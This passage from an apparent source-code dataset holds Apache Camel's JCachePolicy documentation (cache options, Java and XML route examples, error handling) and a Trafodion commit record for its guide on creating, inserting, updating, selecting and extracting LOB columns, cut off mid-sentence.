*lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n== JCache Policy\n\nThe JCachePolicy is an interceptor around a route that caches the \"result of the route\" - the message body - after the route is completed.\n If next time the route is called with a \"similar\" Exchange, the cached value is used on the Exchange instead of executing the route.\n The policy uses the JSR107\/JCache API of a cache implementation, so it's required to add one (e.g. Hazelcast, Ehcache) to the classpath.\n\nThe policy takes a _key_ value from the received Exchange to get or store values in the cache. By default the _key_ is the message body.\n For example if the route - having a JCachePolicy - receives an Exchange with a String body \"fruit\" and the body at the\n end of the route is \"apple\", it stores a _key\/value_ pair \"fruit=apple\" in the cache. If next time another Exchange arrives\n with a body \"fruit\", the value \"apple\" is taken from the cache instead of letting the route process the Exchange.\n\nSo by default the message body at the beginning of the route is the cache _key_ and the body at the end is the stored _value_.\n It's possible to use something else as _key_ by setting a Camel Expression via _.setKeyExpression()_\n that will be used to determine the key.\n\nThe policy needs a JCache Cache. It can be set directly by _.setCache()_ or the policy will try to get or create the Cache\n based on the other parameters set.\n\nSimilar caching solution is available for example in Spring using the @Cacheable annotation.\n\n== JCachePolicy Fields\n\n\n[width=\"100%\",cols=\"2,5,3,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cache* | The Cache to use to store the cached values. If this value is set, _cacheManager_, _cacheName_ and _cacheConfiguration_ is ignored. | | Cache\n| *cacheManager* | The CacheManager to use to lookup or create the Cache. Used only if _cache_ is not set. | Try to find a CacheManager in CamelContext registry or calls the standard JCache _Caching.getCachingProvider().getCacheManager()_. | CacheManager\n| *cacheName* | Name of the cache. Get the Cache from cacheManager or create a new one if it doesn't exist. | RouteId of the route. | String\n| *cacheConfiguration* | JCache cache configuration to use if a new Cache is created | Default new _MutableConfiguration_ object. | CacheConfiguration\n| *keyExpression* | An Expression to evaluate to determine the cache key. | Exchange body | Expression\n| *enabled* | If policy is not enabled, no wrapper processor is added to the route. It has impact only during startup, not during runtime. For example it can be used to disable caching from properties. | true | boolean\n|===\n\n== How to determine cache to use?\n\n\n== Set cache\n\nThe cache used by the policy can be set directly. This means you have to configure the cache yourself and get a JCache Cache object,\n but this gives the most flexibility. For example it can be setup in the config xml of the cache provider (Hazelcast, EhCache, ...)\n and used here. Or it's possible to use the standard Caching API as below:\n\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Object.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 60)));\nCacheManager cacheManager = Caching.getCachingProvider().getCacheManager();\nCache cache = cacheManager.createCache(\"orders\",configuration);\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCache(cache);\n\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Set cacheManager\n\nIf the _cache_ is not set, the policy will try to lookup or create the cache automatically.\n If the _cacheManager_ is set on the policy, it will try to get cache with the set _cacheName_ (routeId by default) from the CacheManager.\n Is the cache does not exist it will create a new one using the _cacheConfiguration_ (new MutableConfiguration by default).\n\n[source,java]\n----------------------------\n\/\/In a Spring environment for example the CacheManager may already exist as a bean\n@Autowire\nCacheManager cacheManager;\n...\n\n\/\/Cache \"items\" is used or created if not exists\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCacheManager(cacheManager);\njcachePolicy.setCacheName(\"items\")\n----------------------------\n\n== Find cacheManager\n\nIf _cacheManager_ (and the _cache_) is not set, the policy will try to find a JCache CacheManager object:\n\n* Lookup a CacheManager in Camel registry - that falls back on JNDI or Spring context based on the environment\n* Use the standard api _Caching.getCachingProvider().getCacheManager()_\n\n[source,java]\n----------------------------\n\/\/A Cache \"getorders\" will be used (or created) from the found CacheManager\nfrom(\"direct:get-orders\").routeId(\"getorders\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Partially wrapped route\n\nIn the examples above the whole route was executed or skipped. A policy can be used to wrap only a segment of the route instead of all processors.\n\n[source,java]\n----------------------------\nfrom(\"direct:get-orders\")\n .log(\"Order requested: ${body}\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\")\n .end()\n .log(\"Order found: ${body}\");\n----------------------------\n\nThe _.log()_ at the beginning and at the end of the route is always called, but the section inside _.policy()_ and _.end()_ is executed based on the cache.\n\n== KeyExpression\n\nBy default the policy uses the received Exchange body as _key_, so the default expression is like _simple(\"$\\{body\\})_.\n We can set a different Camel Expression as _keyExpression_ which will be evaluated to determine the key.\n For example if we try to find an _order_ by an _orderId_ which is in the message headers,\n set _header(\"orderId\")_ (or _simple(\"${header.orderId})_ as _keyExpression_.\n\nThe expression is evaluated only once at the beginning of the route to determine the _key_. If nothing was found in cache,\n this _key_ is used to store the _value_ in cache at the end of the route.\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Order.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 10)));\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCacheConfiguration(configuration);\njcachePolicy.setCacheName(\"orders\")\njcachePolicy.setKeyExpression(simple(\"${header.orderId}))\n\n\/\/The cache key is taken from \"orderId\" header.\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${header.orderId}\")\n .bean(OrderService.class,\"findOrderById(${header.orderId})\");\n----------------------------\n\n== Camel XML DSL examples\n\n== Use JCachePolicy in an XML route\n\nIn Camel XML DSL we need a named reference to the JCachePolicy instance (registered in CamelContext or simply in Spring).\n We have to wrap the route between <policy>...<\/policy> tags after <from>.\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <policy ref=\"jCachePolicy\" >\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <\/route>\n<\/camelContext>\n----------------------------\n\nSee this example when only a part of the route is wrapped:\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <log message=\"Start - This is always called. body:${body}\"\/>\n <policy ref=\"jCachePolicy\" >\n <log message=\"Executing route, not found in cache. body:${body}\"\/>\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <log message=\"End - This is always called. body:${body}\"\/>\n <\/route>\n<\/camelContext>\n----------------------------\n\n\n== Define CachePolicy in Spring\n\nIt's more convenient to create a JCachePolicy in Java especially within a RouteBuilder using the Camel DSL expressions,\n but see this example to define it in a Spring XML:\n\n[source,xml]\n----------------------------\n<bean id=\"jCachePolicy\" class=\"org.apache.camel.component.jcache.policy.JCachePolicy\">\n <property name=\"cacheName\" value=\"spring\"\/>\n <property name=\"keyExpression\">\n <bean class=\"org.apache.camel.model.language.SimpleExpression\">\n <property name=\"expression\" value=\"${header.mykey}\"\/>\n <\/bean>\n <\/property>\n<\/bean>\n----------------------------\n\n== Create Cache from XML\n\nIt's not strictly speaking related to Camel XML DLS, but JCache providers usually have a way to configure the cache in an XML file.\n For example with Hazelcast you can add a _hazelcast.xml_ to classpath to configure the cache \"spring\" used in the example above.\n\n[source,xml]\n----------------------------\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<hazelcast xmlns=\"http:\/\/www.hazelcast.com\/schema\/config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.hazelcast.com\/schema\/config hazelcast-config-3.11.xsd\" >\n\n <cache name=\"spring\">\n <key-type class-name=\"java.lang.String\"\/>\n <value-type class-name=\"java.lang.String\"\/>\n <expiry-policy-factory>\n <timed-expiry-policy-factory expiry-policy-type=\"CREATED\" duration-amount=\"60\" time-unit=\"MINUTES\"\/>\n <\/expiry-policy-factory>\n <\/cache>\n\n<\/hazelcast>\n----------------------------\n\n\n== Special scenarios and error handling\n\nIf the Cache used by the policy is closed (can be done dynamically), the whole caching functionality is skipped,\n the route will be executed every time.\n\nIf the determined _key_ is _null_, nothing is looked up or stored in cache.\n\nIn case of an exception during the route, the error handled is called as always. If the exception gets _handled()_,\n the policy stores the Exchange body, otherwise nothing is added to the cache.\n If an exception happens during evaluating the keyExpression, the routing fails, the error handler is called as normally.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f463ce29b16b9be39c5c5814ab9357a1f50b5b2f","subject":"Incorporate Comments 1","message":"Incorporate Comments 1\n","repos":"mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion","old_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/working_with_lob.adoc","new_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/working_with_lob.adoc","new_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[#working with lobs]\r\n= Working with LOBs\r\n\r\n[#creating a sql table with lob columns]\r\n== Creating a SQL Table with LOB Columns\r\n\r\nWhen creating a SQL table with LOB columns, following relevant tables and files are created as well:\r\n\r\n* One LOB MD table.\r\n* Two dependent descriptor tables.\r\n* HDFS data file (locates at \/user\/trafodion\/lobs) for each column.\r\n\r\n[#syntax]\r\n== Syntax\r\n\r\n```\r\nCREATE TABLE table-name (column-spec[, column-spec]\u2026)\r\n```\r\n\r\n```\r\ncolumn-spec is:\r\nlob-column-spec | \r\nother-column-spec\r\n\r\nlob-column-spec is:\r\ncolumn-name {lob-data-type}[column-constraint]\r\n\r\nother-column-spec is:\r\ncolumn-name {data-type}[column-constraint]\r\n\r\nlob-data-type is:\r\nBLOB | CLOB [({numeric literal} [unit])] [STORAGE 'storage literal']\r\n\r\nunit is:\r\nempty | \r\nK | \r\nM | \r\nG \r\n```\r\n\r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_storage literal_`\r\n\r\n+\r\nCurrently Trafodion only supports `'EXTERNAL'` here. \r\n\r\n+\r\nExternal LOB object that are not managed by Trafodion.\r\n\r\n* `_empty_`\r\n\r\n+\r\nNumber of bytes specified by the numeric literal.\r\n\r\n* `_K_`\r\n\r\n+\r\nNumeric literal value * 1024.\r\n\r\n* `_M_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024.\r\n\r\n* `_G_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024 * 1024.\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example creates a table tlob1 with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob1 (c1 INT NOT NULL, c2 BLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob2 with 3 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130txt_limit50 with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130txt_limit50 (c1 INT NOT NULL, c2 CLOB(50), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130bin_limit1K with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130bin_limit1K (c1 INT NOT NULL, c2 BLOB(1 K), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130ext with 4 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n```\r\n\r\n[#hdfs location of lob data]\r\n=== HDFS Location of LOB Data\r\n\r\nWhen a LOB table is created, the underlying LOB data needs to be stored in HDFS. It is in the \/user\/trafodion\/lobs by default. \r\n\r\nAll columns of a table that are declared as LOB types will have all their data in one file derived from the table's Object UID and the LOB number of that column which gets assigned during creation.\r\n\r\nThe following is a LOB file with 2 columns you will see 2 files in HDFS:\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0001\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0002\r\n\r\nAs rows are added to this table, the LOB data for each row gets appended to the corresponding column\u2019s LOB data file. \r\n\r\n[#inserting into a sql table containing lob columns]\r\n== Inserting into a SQL Table Containing LOB Columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO table-name [(target-col-list)] insert-source\r\n```\r\n\r\n```\r\ntarget-col-list is: \r\ncolname[, colname]... \r\n\r\ninsert-source is: \r\nVALUES(column-expr[, column-expr]...)\r\n\r\ncolumn-expr is:\r\nlob-query-expr |\r\nother-query-expr\r\n\r\nlob-query-expr is: \r\nNULL | ? |\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression') |\r\nFILETOLOB('lob source file name') |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value) |\r\nEXTERNALTOLOB('external lob source file name') \r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n``` \r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_other-query-expr_`\r\n+\r\nFor the syntax and description of `_other-query-expr_`, see the `_query-expr_` in the <<select_statement,SELECT Statement>>.\r\n\r\n* `_EMPTY_BLOB(), EMPTY_CLOB()_`\r\n+\r\nReturns an empty LOB handle. \r\n\r\n* `_STRINGTOLOB_`\r\n+\r\nConverts a simple string literal into LOB format. \r\n\r\n** `_string literal expression_`\r\n+\r\nis a series of characters enclosed in single quotes.\r\n\r\n* `_FILETOLOB_`\r\n+\r\nConverts data from a local linux\/hdfs file into LOB format.\r\n\r\n* `_BUFFERTOLOB_`\r\n+\r\nTakes an address and a size of an input buffer, and converts the data pointed to by that buffer into LOB. \r\n\r\n** `_lob source buffer address_`\r\n+\r\nThe long value of the user buffer address in int64.\r\n\r\n** `_lob length value_`\r\n+\r\nThe length of the user specified lob buffer in int64.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nThe source for inserting into a LOB can be any of the following:\r\n\r\n* A parameter.\r\n+\r\nAn unnamed parameter can be used to prepare a statement and then during an execution, either a function or a simple string parameter can be passed in which will be converted to LOB data.\r\n\r\n* `EMPTY_BLOB()` or `EMPTY_CLOB()` \r\n\r\n** If `EMPTY_BLOB()` or `EMPTY_CLOB()` is specified, then a dummy lob handle is created. \r\n\r\n*** No data is associated with the empty LOBs yet, but these dummy LOB handles can later be used to populate with new LOB data. If the LOB had data previously associated with it, it will be erased.\r\n\r\n*** The dummy LOB handle will get the same datatype as the underlying column.\r\n+\r\nFor example, if the LOB column was defined as `'EXTERNAL'` during table creation, then the LOB column gets that type. If it\u2019s not defined, then it is considered as a regular LOB. \r\n\r\n** An empty LOB is distinct from a LOB containing a string of length zero or a null LOB.\r\n\r\n* An in-memory LOB which is simple string data. \r\n+\r\nTo insert a string literal, you need to provide `STRINGTOLOB('string literal expression')`.\r\n\r\n* An on-platform file (linux\/hdfs file) containing binary or text data.\r\n+\r\nTo insert an on-platform file, you need to provide `FILETOLOB('lob source file name')`. \r\n\r\n* A user buffer of a specified length allocated in user space.\r\n+\r\nTo insert a buffer, you need to provide the address and size of the buffer.\r\n\r\n* An external LOB.\r\n+ \r\nWhen an external LOB is specified via `EXTERNALTOLOB('external lob source file name')`, the data associated with the external HDFS file is not transferred into the Trafodion LOB. Instead, Trafodion stores the file path\/handle of the external file. \r\n+\r\nFor example, if you have a directory of pictures, you can specify the full hdfs path to each picture file to this function and the path will get stored in the Trafodion table. Later during retrieval, the file name will be used to go to the actual file to retrieve the data. \r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example uses the `STRINGTOLOB` function that converts a simple string literal into LOB format before inserting.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES(1,stringtolob('inserted row'));\r\n```\r\n\r\n* This example uses the `FILETOLOB` function that converts data from a local file into LOB format, and stores all data into HDFS associated with that value.\r\n+\r\n```\r\nINSERT INTO tlob130txt1 VALUES(1,filetolob('lob_input_a1.txt'));\r\n```\r\n\r\n* This example takes an int64 value as an input which is an address to a buffer and a size parameter. The buffer contents are converted to LOB format and stored in HDFS.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES (1, buffertolob(LOCATION 124647474, SIZE 2048));\r\n```\r\n\r\n* This example uses different functions to convert strings, files, external lob into LOB data. The EXTERNALTOLOB function takes an external file. \r\n+\r\n```\r\nINSERT INTO tlob130ext VALUES(1, STRINGTOLOB('first lob'), \r\nFILETOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'), \r\nEXTERNALTOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'));\r\n```\r\n\r\n* This example uses a parameter.\r\n+\r\n```\r\nPREPARE S FROM INSERT INTO t130lob2 VALUES (1, ?);\r\nEXECUTE S USING 'fgfgfhfhfhfhhfhfhfhjfkkfkffllflflfll';\r\n```\r\n\r\n* This example uses the `EMPTY_BLOB` function to insert an empty lob and creates a dummy lob handle. \r\n+\r\n```\r\nINSERT INTO t130lob2 VALUES (1, empty_blob());\r\n```\r\n\r\n[#inserting into a sql table containing lob columns using select clause]\r\n== Inserting into a SQL Table Containing LOB Columns Using Select Clause\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO target-table [(target-col-list-expr)] SELECT [source-col-list-expr] FROM source-table\r\n```\r\n\r\n```\r\ntarget-col-list-expr is: \r\ntarget-colname[, target-colname]...\r\n\r\ntarget-colname is: \r\nlob-column-name |\r\nother-column-name\r\n\r\nsource-col-list-expr is: \r\nsource-colname[, source-colname]...\r\n\r\nsource-colname is: \r\nhive varchar column name | \r\ntrafodion varchar column name | \r\ntrafodion char column name |\r\ntrafodion lob column name\r\n\r\nsource-table is: \r\nhive table |\r\ntrafodion table \r\n```\r\n\r\n[#semantics]\r\n=== semantics\r\n\r\n* `_target-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the target table in which to insert values. \r\n\r\n+\r\nThe data type of each target column must be compatible with the data type of its corresponding source value. \r\n\r\n+\r\nWithin the list, each target column must have the same position as its associated source value.\r\n\r\n** `_target-colname_` \r\n+\r\nis a SQL identifier that specifies a target column name.\r\n\r\n* `_source-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the source table from which to get values. \r\n\r\n** `_source-colname_` \r\n+\r\nis a SQL identifier that specifies a source column name.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen inserting from a source Trafodion table column into a target table, the source column subtype of the LOB column needs to match the target table column. That is, you cannot insert from an external LOB column into a regular LOB column in the target. They both need to be the same type. \r\n\r\nThe source for the *select clause* can be any of the following: \r\n\r\n* A source hive table column that is a hive varchar column\r\n* A source table column that is a Trafodion varchar, char and LOB column\r\n* A source table column that is also a LOB datatype.\r\n\r\n[#examples]\r\n=== Examples \r\n* This example inserts the first 10 rows of d_date_sk and d_date_id selected from the source hive table hive.hive.date_dim into the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2 SELECT [first 10] d_date_sk,d_date_id FROM hive.hive.date_dim;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130var into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130var;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130char into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130char;\r\n```\r\n\r\n* This example inserts the c1, c2 and c3 selected from the source Trafodion table t130lob2 into the target table t130lob3, and then shows the result.\r\n+\r\n```\r\nINSERT INTO t130lob3 SELECT c1,c2,c3 FROM t130lob2;\r\nSELECT c1,lobtostring(c2,100),lobtostring(c3,100) FROM t130lob3;\r\n```\r\n\r\n[#updating a sql table containing lob columns]\r\n== Updating a SQL Table Containing LOB Columns\r\n\r\nThe source for updating a LOB can be divided into 2 groups:\r\n\r\n* Update using parameters\/functions\r\n* Update using LOB handle\r\n\r\n[#updating using parameters\/functions]\r\n=== Updating Using Parameters\/Functions\r\n\r\nThe following parameters\/functions can be used to update.\r\n\r\n* A parameter\r\n* `EMPTY_BLOB` or `EMPTY_CLOB`\r\n* An in-memory lob which is a simple string data \r\n+\r\nTo insert this string, a literal needs to be provided\r\n* An on-platform file (linux\/hdfs file) containing text or binary data \r\n* A user buffer of a specified length allocated in user space\r\n* An external LOB file in HDFS\r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE table-name {set-clause-type1 | set-clause-type2} \r\n```\r\n\r\n```\r\nset-clause-type1 is: \r\nSET set-clause[, set-clause ].. \r\n\r\nset-clause is: \t\r\nlob_column-name = {lob_query-expr} \r\n\r\nlob_query-expr is:\r\nNULL | ? |\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression'[, APPEND]) |\r\nFILETOLOB('lob source file name'[, APPEND]) |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value[, APPEND]) |\r\nEXTERNALTOLOB('external lob source file name'[, APPEND])\r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\nFor more information, see Semantics in <<inserting into a sql table containing lob columns,Inserting into a SQL Table Containing LOB Columns>>.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* In the table tlob1where c1 is 3, updates (appends) the value of c2 to lob_update.txt.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to anoush.jpg.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('anoush.jpg');\r\n```\r\n\r\n* In the table tlob1 where c1 is 3, updates (appends) the value of c2 to lob_update.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('hdfs:\/\/\/lobs\/lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to the buffer location at 1254674 with 4000-byte length.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=buffertolob(LOCATION 12546474, SIZE 4000);\r\n```\r\n\r\n* In the table tlob130ext where c1 is 2, updates (overwrites) the value of c4 to lob_input_d1.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob130ext SET c4=externaltolob('hdfs:\/\/\/lobs\/lob_input_d1.txt') WHERE c1=2;\r\n```\r\n\r\n* In the table t130lob2 where c1 is 1, updates (overwrites) value of the c2 to xyxyxyxyxyxyx.\r\n+\r\n```\r\nPREPARE S FROM UPDATE t130lob2 SET c2=? WHERE c1 =1;\r\nEXECUTE S USING 'xyxyxyxyxyxyx';\r\n```\r\n\r\n[# updating using lob handle]\r\n=== Updating Using Lob Handle\r\n\r\nA LOB handle is specified to the update (similar to extract). \r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE LOB (LOB 'lob handle', lob update expression)\r\n```\r\n\r\n```\r\nlob update expression is: \r\nLOCATION lob source buffer address, LENGTH lob length value [, APPEND]) | \r\nEMPTY_BLOB() | \r\nEMPTY_CLOB()\r\n```\r\n\r\nFor more information about examples, see http:\/\/trafodion.incubator.apache.org\/docs\/jdbct4ref_guide\/index.html[*Trafodion JDBC Type 4 Programmer\u2019s Reference Guide*].\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* The keyword `APPEND` can be used to append to lob data that may already exist in a LOB column. If it is not specified, the data is overwritten.\r\n\r\n* When a LOB column is updated or overwritten, a new section is written into the LOB data file. The old section remains in HDFS but won\u2019t have any pointer or reference to it.\r\n\r\n* When a LOB column is appended, a new chunk is inserted into HDFS and a new row is added in the LOB Descriptor Chunks table to keep track of this new chunk, belonging to the existing row\/LOB data. \r\n\r\n+\r\nSo a LOB column that contains data that has been appended several times can contain multiple descriptor rows in the Descriptor Chunks table to describe where each chunk belonging to this LOB begins\/ends.\r\n\r\n* `APPEND` cannot be used on function `EXTERNALTOLOB`.\r\n\r\n* When an external LOB is updated outside of Trafodion, an update needs to be done to update the descriptor files in Trafodion. \r\n+\r\nFor example, if the external file changes in size, the descriptor file needs to be updated to reflect that. Since this is outside the control of Trafodion, the user needs to do this. If not, when extracting data, only partial data may be returned. \r\n\r\n* If a column is declared with the `STORAGE 'External'` attribute, the `STRINGTOLOB` or `FILETOLOB` functions cannot be used to insert data into that column. \r\n+\r\nSimilarly, if a column is declared without the `STORAGE 'External'` attribute, the `EXTERNALTOLOB` function cannot be used to insert\/update data into that column.\r\n+\r\nThat is, once the storage for a LOB column is declared at CREATE time, the attribute is set and cannot be modified. \r\n\r\n[#selecting column from a sql table containing lob columns]\r\n== Selecting Column from a SQL Table Containing LOB Columns\r\n\r\nSelecting a row from a table will give back the lob handle for the lob column. \r\n\r\nNOTE: The entry in each lob column in the SQL table only contains the LOB handle.\r\n\r\nOnce the LOB handle has been retrieved, it can be used to retrieve the actual lob data from HDFS.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSELECT lob_query-expr[, lob_query-expr] FROM table-name\r\n```\r\n\r\n```\r\nlob_query_expr is: \r\nlobtostring(lob column) |\r\nlob column\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example selects c2 from table tlob1 and returns the lob handle of c2.\r\n+\r\n```\r\nSELECT c2 FROM tlob1;\r\nC2\r\n----------------------------------------------------------------------------------------------------\r\n\r\nLOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\" \r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n[#extracting lob data from a sql table containing lob columns]\r\n== Extracting LOB Data from a SQL Table Containing LOB Columns \r\n\r\nExtract lob data can be done in two ways:\r\n\r\n* Extract lob data into a file for a given lob handle\r\n+\r\nExtract from a LOB column straight into an on-platform linux or HDFS file in one shot. \r\n\r\n+\r\nTrafodion engine will take care of buffering the data and retrieve the lob data into the target file.\r\n\r\n* Extract lob data into a user specified buffer\r\n+\r\nExtract from a LOB column into a target user buffer of a specified size. \r\n+\r\nTrafodion engine will retrieve exactly the amount of requested data. \r\n+\r\nThe user\/application will be responsible for redriving the extract until end of data. \r\n+\r\nThe extracted buffer data can then be written to files or another location as the application chooses. \r\n\r\n[#extracting lob data into a file for a given lob handle]\r\n=== Extracting Lob Data into a File for a Given Lob Handle \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOFILE (LOB 'lob handle as quoted string', 'filename URI format' [OPTION]) \r\n```\r\n\r\n```\r\nOPTION is: \r\n[, TRUNCATE]\r\n[, CREATE, TRUNCATE]\r\n[, APPEND] \r\n[, CREATE, APPEND]\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it.\r\n+\r\nIf the target file does not exist, an error will be raised.\r\n\r\n* `CREATE, TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and write to it.\r\n\r\n* `APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, an error will be 